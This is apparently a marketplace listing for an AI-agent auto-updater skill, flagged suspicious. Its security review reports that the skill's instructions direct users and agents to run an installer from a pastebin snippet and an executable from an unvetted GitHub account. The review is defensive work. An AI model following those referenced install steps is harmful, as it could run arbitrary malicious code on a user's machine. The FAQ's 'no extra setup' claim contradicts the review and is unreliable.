← Back to Skills Marketplace

Update

Name: Update
Author: timclawbot

by timclawbot · GitHub ↗ · v1.0.0

windowsdarwinlinux ⚠ suspicious

1209

Downloads

Stars

Active Installs

Versions

Install in OpenClaw

/install update

Description

Automatically update Clawdbot and all installed skills once daily. Runs via cron, checks for updates, applies them, and messages the user with a summary of what changed.

Usage Guidance

This skill appears to do what it says (schedule and run updates) but has two things you should verify before installing: (1) The SKILL.md expects you to install and run 'openclawcli' but the skill metadata does not declare that required binary — ask the publisher to add it to metadata. (2) The instructions point to a third-party GitHub release and a glot.io snippet for installing openclawcli; treat these as unverified installers. Do not run arbitrary downloaded executables without verifying the publisher and release integrity. If you proceed: review the exact cron command the skill will install, run clawdhub update --all --dry-run first, back up any critical skills/config, ensure you are comfortable granting the user running Clawdbot permission to update global packages, and prefer installing openclawcli from an official project release or your organization's vetted source. If you cannot validate the openclawcli source, consider performing updates manually instead.

Capability Analysis

Type: OpenClaw Skill Name: update Version: 1.0.0 The skill's core functionality for auto-updating Clawdbot and other skills appears benign. However, the `SKILL.md` file contains highly insecure instructions for installing its `openclawcli` prerequisite. For macOS, it directs users to visit `glot.io/snippets/hfd3x9ueu5` and execute an installation command from this untrusted pastebin, which is a critical remote code execution (RCE) vulnerability. For Windows, it instructs downloading and running an executable from an arbitrary GitHub user (`Ddoy233/openclawcli`), posing a significant supply chain risk. These instructions, if followed by an AI agent or user, could lead to system compromise by executing arbitrary, potentially malicious, external code.

Capability Assessment

⚠ Purpose & Capability

The SKILL.md describes exactly the expected behavior for an auto-updater (scheduling a cron job, running clawdbot/clawdhub update commands). However, the skill repeatedly requires the 'openclawcli' utility for operation but the registry metadata lists no required binaries or primary credential — an explicit prereq is missing from the declared requirements. That mismatch is an incoherence worth flagging.

ℹ Instruction Scope

Runtime instructions stay within the stated purpose: add a cron job, run clawdbot/clawdhub update, and report results. They reference system state (cron.enabled, Gateway running) and advise checking Task Manager / process state which is reasonable for a scheduler. The instructions do, however, point users to downloading/activating external tooling (openclawcli) and include global package-manager commands that will modify system-installed packages — operations that require elevated filesystem privileges and are therefore sensitive.

⚠ Install Mechanism

There is no formal install spec (instruction-only), which is low-risk in itself, but the SKILL.md tells users to download openclawcli from a third-party GitHub release (github.com/Ddoy233/...) and to run a snippet from glot.io. Those are not clearly official project hosts and could deliver arbitrary code; recommending these resources without verification is a high-risk practice.

ℹ Credentials

The skill declares no environment variables or credentials, which matches the low-declaration footprint. However, it performs privileged operations (global npm/pnpm/bun updates, writing to skill directories, creating cron jobs) that implicitly require filesystem write permissions or elevated privileges; this is proportionate to an updater but should be made explicit. Also, the missing declared dependency on openclawcli hides an important required binary/privilege.

✓ Persistence & Privilege

The skill's persistent effect is to create a scheduled cron job that runs daily — this matches the updater purpose and 'always' is not set. It does introduce ongoing privileged activity (periodic updates that modify installed software), but that is within scope for an auto-updater and is not inherently an overreach in metadata or flags.

How to Use

Make sure OpenClaw is installed (local or Docker)
Run the install command in chat: /install update
After installation, invoke the skill by name or use /update
Provide required inputs per the skill's parameter spec and get structured output

Version History

v1.0.0

- Initial release of the auto-updater skill. - Adds daily automatic updates for Clawdbot and all installed skills via a scheduled cron job. - Sends a summary message to the user detailing updates and any issues encountered. - Supports Windows, macOS, and Linux (requires openclawcli utility to be installed and running). - Includes troubleshooting tips and manual command references for managing updates.

Metadata

Slug update

Version 1.0.0

License —

All-time Installs 2

Active Installs 1

Total Versions 1

Frequently Asked Questions

What is Update?

Automatically update Clawdbot and all installed skills once daily. Runs via cron, checks for updates, applies them, and messages the user with a summary of what changed. It is an AI Agent Skill for Claude Code / OpenClaw, with 1209 downloads so far.

How do I install Update?

Run "/install update" in the OpenClaw or Claude Code chat to install it in one step — no extra setup required.

Is Update free?

Yes, Update is completely free (open-source). You can download, install and use it at no cost.

Which platforms does Update support?

Update is cross-platform and runs anywhere OpenClaw / Claude Code is available (windows, darwin, linux).

Who created Update?

It is built and maintained by timclawbot (@timclawbot); the current version is v1.0.0.

More Skills